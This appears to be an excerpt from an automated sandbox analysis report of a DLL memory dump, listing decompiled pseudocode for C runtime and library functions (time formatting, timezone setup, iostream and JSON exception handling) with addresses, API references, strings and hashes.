												_t179 = _v40;
												 *((short*)( *_t179)) =  *_t173;
												 *_t179 =  *_t179 + 2;
												 *_t181 =  *_t181 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t178 =  &(_t178[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t178 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t181;
												if( *_t181 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t178 =  &(_t178[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t181 =  *_t181 - 1;
												_t159 =  *_t178 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E6E21806D(_t145, _t178, _t181, _t178, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E6E21806D(_t145, _t178, _t181, _t178, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t178[3]);
											}
										} else {
											_t153 =  &(_t178[5]);
											_v28 =  &(_t178[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t200 = _v33;
							if(_v33 == 0) {
								_t133 = E6E2141EF(_t165, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147, 0);
							} else {
								_t133 = E6E2143E3(_t165, _t200,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147);
							}
							_t180 = _t181;
							_t172 = _t133 - 1;
							if(_t172 <= 0) {
								L27:
								E6E1CDEE1(_t181);
								goto L28;
							} else {
								_t148 = _v32;
								_t182 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t180;
									_t180 =  &(_t180[0]);
									 *( *_t182) = _t135;
									 *_t182 =  &(( *_t182)[0]);
									 *_t148 =  *_t148 - 1;
									_t172 = _t172 - 1;
									if(_t172 > 0) {
										continue;
									}
									break;
								}
								_t181 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t183 = E6E20F26D(_t165, _t137 & _t165);
							_v28 = _t183;
							_pop(_t165);
							__eflags = _t183;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t183 = 0xdddd;
							L14:
							_t181 = _t183 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E6E1E01B0();
						_t183 = _t185;
						_v28 = _t183;
						if(_t183 == 0) {
							goto L30;
						}
						 *_t183 = 0xcccc;
						goto L14;
					}
				}
			}

0x6e207d8a
0x6e207d99
0x6e207d9f
0x6e207da2
0x6e207da9
0x6e207dac
0x6e207db2
0x6e207db5
0x6e207db9
0x6e207dbc
0x6e207dc0
0x6e207dc3
0x6e207dda
0x6e207dc5
0x6e207dc8
0x6e207dd2
0x6e207dca
0x6e207dca
0x6e207dca
0x6e207dc8
0x6e207de7
0x00000000
0x6e207ded
0x6e207df6
0x6e207dfd
0x6e207e07
0x6e207e0a
0x6e207e12
0x6e207e1a
0x6e207e22
0x6e207e29
0x6e207e2f
0x6e207e36
0x6e207e38
0x6e207e4e
0x6e207e5c
0x6e207e3a
0x6e207e47
0x6e207e47
0x6e207e61
0x6e207e65
0x00000000
0x6e207e6b
0x6e207e6b
0x6e207e6e
0x6e207e73
0x6e207e77
0x6e207ed1
0x6e207ed1
0x6e207ed3
0x6e207ed3
0x6e207ed8
0x6e207f58
0x6e207f5a
0x6e207f5f
0x6e2081d6
0x6e2081d6
0x6e2081d6
0x6e2081d9
0x6e2081dc
0x00000000
0x00000000
0x6e207f68
0x6e207f6b
0x6e207f42
0x6e207f44
0x6e207f57
0x6e207f57
0x6e207f6d
0x6e207f71
0x6e207f71
0x6e207f73
0x6e207f76
0x6e207f78
0x6e207f7b
0x6e207f7b
0x6e207f7e
0x6e207f7f
0x6e207f7f
0x6e207f84
0x6e207f87
0x6e207f8a
0x6e207f8d
0x6e207f90
0x6e2080c5
0x6e2080c5
0x6e2080c8
0x6e208195
0x6e208195
0x6e208198
0x6e2081b1
0x6e2081b5
0x6e2081b5
0x6e2081b7
0x6e2081b7
0x6e2081c7
0x6e2081cc
0x6e2081cf
0x6e2081d1
0x6e2081ec
0x00000000
0x6e2081f2
0x6e2081d3
0x6e2081d3
0x00000000
0x6e2081d3
0x6e20819a
0x6e20819a
0x6e20819d
0x00000000
0x00000000
0x6e20819f
0x6e20819f
0x6e2081a2
0x6e2081a7
0x6e2081aa
0x6e2081ad
0x00000000
0x6e2081ad
0x6e2080ce
0x6e2080ce
0x6e2080d1
0x6e208181
0x6e208181
0x6e208184
0x6e20818d
0x6e208191
0x6e208191
0x00000000
0x6e208191
0x6e208186
0x6e208186
0x6e208189
0x00000000
0x00000000
0x00000000
0x6e20818b
0x6e2080d7
0x6e2080d7
0x6e2080da
0x6e20816d
0x6e20816d
0x6e208170
0x6e208179
0x6e20817d
0x6e20817d
0x00000000
0x6e20817d
0x6e208172
0x6e208172
0x6e208175
0x00000000
0x00000000
0x00000000
0x6e208177
0x6e2080e0
0x6e2080e0
0x6e2080e3
0x6e20810c
0x6e20810f
0x6e208113
0x6e20811d
0x6e208115
0x6e208115
0x6e208115
0x6e208123
0x6e208126
0x6e208142
0x6e208142
0x6e208145
0x6e208148
0x00000000
0x00000000
0x6e20814e
0x6e208151
0x6e208151
0x6e208154
0x00000000
0x00000000
0x6e208158
0x6e20815b
0x6e20815e
0x6e208161
0x6e208163
0x6e208166
0x6e208169
0x00000000
0x00000000
0x00000000
0x6e20816b
0x6e208128
0x6e208128
0x6e20812b
0x00000000
0x00000000
0x6e20812d
0x6e208135
0x6e208138
0x6e20813b
0x6e20813b
0x00000000
0x6e208126
0x6e2080e5
0x6e2080e8
0x00000000
0x00000000
0x6e2080ef
0x6e2080ef
0x6e2080f2
0x6e208105
0x00000000
0x6e208105
0x6e2080f5
0x6e2080f5
0x6e2080f8
0x00000000
0x00000000
0x6e2080fe
0x00000000
0x6e2080fe
0x6e207f96
0x6e208094
0x6e208094
0x6e208097
0x6e2080ba
0x6e2080be
0x6e2080be
0x00000000
0x6e2080be
0x6e208099
0x6e208099
0x6e20809c
0x00000000
0x00000000
0x6e20809e
0x6e20809e
0x6e2080a1
0x6e2080b3
0x00000000
0x6e2080b3
0x6e2080a3
0x6e2080a3
0x6e2080a6
0x00000000
0x00000000
0x6e2080ac
0x00000000
0x6e2080ac
0x6e207f9c
0x6e207f9f
0x6e208041
0x6e208041
0x6e208046
0x6e20804c
0x6e20804c
0x6e20804d
0x6e208050
0x6e208056
0x6e208059
0x6e20805c
0x00000000
0x00000000
0x6e208062
0x6e208065
0x6e208065
0x6e208068
0x00000000
0x00000000
0x6e208070
0x6e208071
0x6e208074
0x6e208077
0x00000000
0x00000000
0x6e20807f
0x6e208082
0x6e208085
0x6e208087
0x6e20808a
0x6e20808d
0x00000000
0x00000000
0x00000000
0x6e20808f
0x6e208065
0x00000000
0x6e208050
0x6e207fa5
0x6e207fa8
0x6e207fbd
0x6e207fc3
0x6e207fca
0x6e207fcc
0x6e208027
0x6e20802d
0x6e20802e
0x6e208030
0x6e208035
0x6e208035
0x6e207fce
0x6e207fce
0x6e207fd1
0x6e207fd1
0x6e208038
0x00000000
0x6e208038
0x6e207faa
0x6e207fad
0x6e208007
0x6e208007
0x6e20800a
0x6e208016
0x6e20801a
0x6e20801a
0x00000000
0x6e20801a
0x6e20800c
0x6e20800c
0x6e20800f
0x00000000
0x00000000
0x00000000
0x6e208011
0x6e207faf
0x6e207fb2
0x6e207fd6
0x6e207fd6
0x6e207fd9
0x6e207ffc
0x6e208000
0x6e208000
0x00000000
0x6e208000
0x6e207fdb
0x6e207fdb
0x6e207fde
0x00000000
0x00000000
0x6e207fe0
0x6e207fe0
0x6e207fe3
0x6e207ff5
0x00000000
0x6e207ff5
0x6e207fe5
0x6e207fe5
0x6e207fe8
0x00000000
0x00000000
0x6e207fee
0x00000000
0x6e207fee
0x6e207fb4
0x6e207fb7
0x00000000
0x00000000
0x00000000
0x6e207fb7
0x00000000
0x6e2081e2
0x6e207eda
0x6e207ee1
0x6e207f0a
0x6e207ee3
0x6e207ef2
0x6e207ef2
0x6e207f11
0x6e207f13
0x6e207f16
0x6e207f3b
0x6e207f3c
0x00000000
0x6e207f18
0x6e207f18
0x6e207f1b
0x6e207f1e
0x6e207f25
0x6e207f28
0x6e207f2b
0x6e207f2e
0x6e207f31
0x6e207f33
0x6e207f36
0x00000000
0x00000000
0x00000000
0x6e207f36
0x6e207f38
0x00000000
0x6e207f38
0x6e207f16
0x6e207e7e
0x6e207e80
0x6e207e82
0x6e207e8a
0x6e207eaf
0x6e207eb1
0x6e207ebb
0x6e207ebd
0x6e207ec0
0x6e207ec1
0x6e207ec3
0x00000000
0x00000000
0x6e207ec9
0x6e207eaa
0x6e207eaa
0x00000000
0x6e207eaa
0x6e207e8e
0x6e207e92
0x6e207e97
0x6e207e99
0x6e207e9e
0x00000000
0x00000000
0x6e207ea4
0x00000000
0x6e207ea4
0x6e207e65

APIs

__freea.LIBCMT ref: 6E207F3C
__freea.LIBCMT ref: 6E207F5A

Strings

a/p, xrefs: 6E208021
am/pm, xrefs: 6E207FBD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 25f9eed67fd3841d359398f240872d521797283c5a0dfcf87321f748db42bc88
Instruction ID: 6fd7686738a6b7622b97c0dfc978ff633e7bba2864f21a3c4520c790ff2acaa4
Opcode Fuzzy Hash: 25f9eed67fd3841d359398f240872d521797283c5a0dfcf87321f748db42bc88
Instruction Fuzzy Hash: A5D1E03591424F9FDB489FE8C8A4BABB7B3FF06301F184159E954AB2C4E3759980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1C4267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				intOrPtr _t41;
				void* _t46;
				intOrPtr _t48;
				void* _t56;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6E1E0117(0x6e2280ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6e286b60;
				_t65 = E6E201EEC(L"For");
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t39 =  *((intOrPtr*)( *0x6e286b60 + 4));
				_t62 =  *(_t39 + 0x6e286b84);
				_t81 =  *((intOrPtr*)(_t39 + 0x6e286b80));
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6e286b60
				_push( *_t8);
				E6E1C220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6e286b60;
					_t41 =  *((intOrPtr*)(_t67 + 4));
					__eflags = ( *(_t41 + 0x6e286b74) & 0x000001c0) - 0x40;
					if(( *(_t41 + 0x6e286b74) & 0x000001c0) == 0x40) {
						L16:
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 4)) + 0x6e286b98)))) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t56 = E6E1C3F18( *((intOrPtr*)( *((intOrPtr*)( *0x6e286b60 + 4)) + 0x6e286b98)),  *( *((intOrPtr*)( *0x6e286b60 + 4)) + 0x6e286ba0) & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t76 =  *( *((intOrPtr*)(_t67 + 4)) + 0x6e286ba0) & 0x0000ffff;
								_t59 = E6E1C3F18( *((intOrPtr*)( *((intOrPtr*)(_t67 + 4)) + 0x6e286b98)), _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6e286b60;
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t48 =  *((intOrPtr*)( *0x6e286b60 + 4));
					 *((intOrPtr*)(_t48 + 0x6e286b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6e286b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				E6E1C3A25( *((intOrPtr*)( *0x6e286b60 + 4)) +  *((intOrPtr*)(_t85 - 0x14)),  *( *((intOrPtr*)( *0x6e286b60 + 4)) +  *((intOrPtr*)(_t85 - 0x14)) + 0xc) | _t63, 0);
				E6E1C21C1(_t63, _t85 - 0x2c, _t82,  *( *((intOrPtr*)( *0x6e286b60 + 4)) +  *((intOrPtr*)(_t85 - 0x14)) + 0xc) | _t63);
				return E6E1E0075( *((intOrPtr*)(_t85 - 0x14)));
			}

0x6e1c426e
0x6e1c4278
0x6e1c4287
0x6e1c428e
0x6e1c4291
0x6e1c4294
0x6e1c429a
0x6e1c42a0
0x6e1c42a2
0x6e1c42ba
0x6e1c42ba
0x6e1c42bd
0x6e1c42c2
0x6e1c42c5
0x6e1c42a4
0x6e1c42a4
0x6e1c42b4
0x6e1c42b4
0x6e1c42b6
0x6e1c42a6
0x6e1c42a8
0x00000000
0x6e1c42aa
0x6e1c42aa
0x6e1c42ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c42ac
0x6e1c42a8
0x6e1c42a4
0x6e1c42c8
0x6e1c42c8
0x6e1c42ce
0x6e1c42d3
0x6e1c42da
0x6e1c42e4
0x6e1c42e8
0x6e1c42ee
0x6e1c42fc
0x6e1c42ff
0x6e1c433c
0x6e1c4350
0x6e1c4353
0x6e1c4356
0x00000000
0x6e1c4358
0x6e1c4358
0x6e1c435a
0x00000000
0x6e1c435c
0x6e1c435c
0x6e1c435c
0x6e1c435e
0x00000000
0x00000000
0x6e1c4360
0x6e1c4366
0x6e1c437c
0x6e1c4389
0x6e1c438c
0x6e1c4393
0x6e1c4396
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4362
0x6e1c4362
0x6e1c4364
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4364
0x00000000
0x6e1c4360
0x6e1c439b
0x6e1c439b
0x6e1c435a
0x6e1c4301
0x6e1c4301
0x6e1c4301
0x6e1c4303
0x00000000
0x00000000
0x6e1c4305
0x6e1c430b
0x6e1c430e
0x6e1c431c
0x6e1c4329
0x6e1c432c
0x6e1c438e
0x6e1c4390
0x6e1c432e
0x6e1c432e
0x6e1c4334
0x6e1c4337
0x00000000
0x6e1c4337
0x6e1c4307
0x6e1c4307
0x6e1c4309
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4309
0x00000000
0x6e1c4305
0x00000000
0x6e1c4301
0x6e1c439d
0x6e1c43a2
0x6e1c43a5
0x6e1c43ab
0x6e1c43d6
0x6e1c42dc
0x6e1c42de
0x6e1c42de
0x6e1c43eb
0x6e1c43f3
0x6e1c4400

APIs

__EH_prolog3_catch.LIBCMT ref: 6E1C426E
_wcslen.LIBCMT ref: 6E1C4281

Strings

`k(n, xrefs: 6E1C42C8
For, xrefs: 6E1C4273, 6E1C4349

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`k(n
API String ID: 1260878687-225852470
Opcode ID: 25898229b32f5b94f0e9e7c13f7a4b39d39c2f11b8d248eda8964cd0445f22f7
Instruction ID: a9d9569edda9de889819896bc4c3b717947335c37ac6d796a75c9a302cfaa021
Opcode Fuzzy Hash: 25898229b32f5b94f0e9e7c13f7a4b39d39c2f11b8d248eda8964cd0445f22f7
Instruction Fuzzy Hash: B541D4396282298FC700DBD8C5D099D77B2BFAAB18B214245E451FB381C738D887E752

Uniqueness

Uniqueness Score: -1.00%

Function 6E218AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E218AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_v8 =  *0x6e28506c ^ _t49;
				 *0x6e285384 =  *0x6e285384 | 0xffffffff;
				 *0x6e285378 =  *0x6e285378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6e287a10 = 0;
				_t14 = E6E211216(0x6e232130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6e232130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6E20F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6E211216(0x6e232130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6e232130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6E20CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6E20CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6E218951(0x6e232130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6E21877C(0x6e232130, _t37, _t57);
					}
				}
				E6E20CBD3(_t43);
				_pop(_t44);
				return E6E1DF8A5(_v8 ^ _t47, _t35, _t44);
			}

0x6e218aac
0x6e218aaf
0x6e218abe
0x6e218ac1
0x6e218ace
0x6e218ad5
0x6e218ad7
0x6e218add
0x6e218aec
0x6e218af3
0x6e218afd
0x6e218b07
0x6e218b0a
0x6e218b17
0x6e218b1a
0x6e218b1c
0x6e218b35
0x6e218b3d
0x6e218b3f
0x6e218b45
0x6e218b4a
0x6e218b41
0x6e218b41
0x00000000
0x6e218b41
0x6e218b1e
0x6e218b1e
0x6e218b1f
0x6e218b1f
0x6e218b1f
0x6e218b4c
0x6e218aff
0x6e218aff
0x6e218aff
0x6e218b59
0x6e218b5b
0x6e218b5f
0x6e218b6f
0x6e218b6f
0x6e218b61
0x6e218b61
0x6e218b64
0x00000000
0x6e218b66
0x6e218b66
0x6e218b67
0x6e218b6c
0x6e218b64
0x6e218b75
0x6e218b7f
0x6e218b8b

APIs

_free.LIBCMT ref: 6E218B1F
_free.LIBCMT ref: 6E218B75

Part of subcall function 6E218951: _free.LIBCMT ref: 6E2189A9
Part of subcall function 6E218951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
Part of subcall function 6E218951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
Part of subcall function 6E218951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60

Strings

0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!#n
API String ID: 314583886-4232261716
Opcode ID: 90d01c3c20d9189d516c72b1769831f7d71be00790ccf9cd5846e2818f83f2b9
Instruction ID: 051f171e6a5d625e250e1f595eb15fb4ce7048ec10a967d2957bcc5fd7a56a74
Opcode Fuzzy Hash: 90d01c3c20d9189d516c72b1769831f7d71be00790ccf9cd5846e2818f83f2b9
Instruction Fuzzy Hash: 98216EB6C0821D5BDB2486A48CC1DDBB7FFDB52724F100695D6A6E6180EB704F84C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E6E1A1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6E1A1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6E1A1EBD(_t24, _t31, _t19);
						_push(0x6e283568);
						_push( &_v32);
					}
					E6E1E3D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1A1F4E

Strings

ios_base::badbit set, xrefs: 6E1A1F0C, 6E1A1F31
ios_base::failbit set, xrefs: 6E1A1F16
ios_base::eofbit set, xrefs: 6E1A1F1B

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 398824b8ad84de54b8c9bc6e5c29bc3d1ef7961b943b7d461293996ba9082440
Instruction ID: 05eb59776bcbb382437538a95bb0e4c6f080153f8de447633dd2ba3e85aa6e90
Opcode Fuzzy Hash: 398824b8ad84de54b8c9bc6e5c29bc3d1ef7961b943b7d461293996ba9082440
Instruction Fuzzy Hash: D7F0F4F3A442182BDB40D9DCC801FEA73AD6B15314F248845EB50AB186FB65A8CECB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E1C407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6E1E00AC(0x6e22808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6E1C5192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6E201D60("[json.exception."));
				E6E1C2D14(_t30, "[json.exception.", E6E201D60("[json.exception."));
				E6E1C1F57( *((intOrPtr*)(_t33 + 8)));
				return E6E1E0075(_t30);
			}

0x6e1c4084
0x6e1c4089
0x6e1c408b
0x6e1c4090
0x6e1c4093
0x6e1c4096
0x6e1c409d
0x6e1c40a4
0x6e1c40a8
0x6e1c40c0
0x6e1c40d0
0x6e1c40d8
0x6e1c40e4

APIs

__EH_prolog3.LIBCMT ref: 6E1C4084
_strlen.LIBCMT ref: 6E1C40AF
_strlen.LIBCMT ref: 6E1C40C6

Strings

[json.exception., xrefs: 6E1C409F, 6E1C40A7, 6E1C40C5, 6E1C40CD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: b04685640ea5808f5d1d767008b45b155374194bc259486ecab719630e66d57a
Instruction ID: bc0faadba2bb0e03b215610f05de76b29a248e994dc31275bee453baeeda551f
Opcode Fuzzy Hash: b04685640ea5808f5d1d767008b45b155374194bc259486ecab719630e66d57a
Instruction Fuzzy Hash: 70F036B16002059FD704DFB8C8406FEB6FFBF44618F540919E409D7641DFB459849791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F345, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E20F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
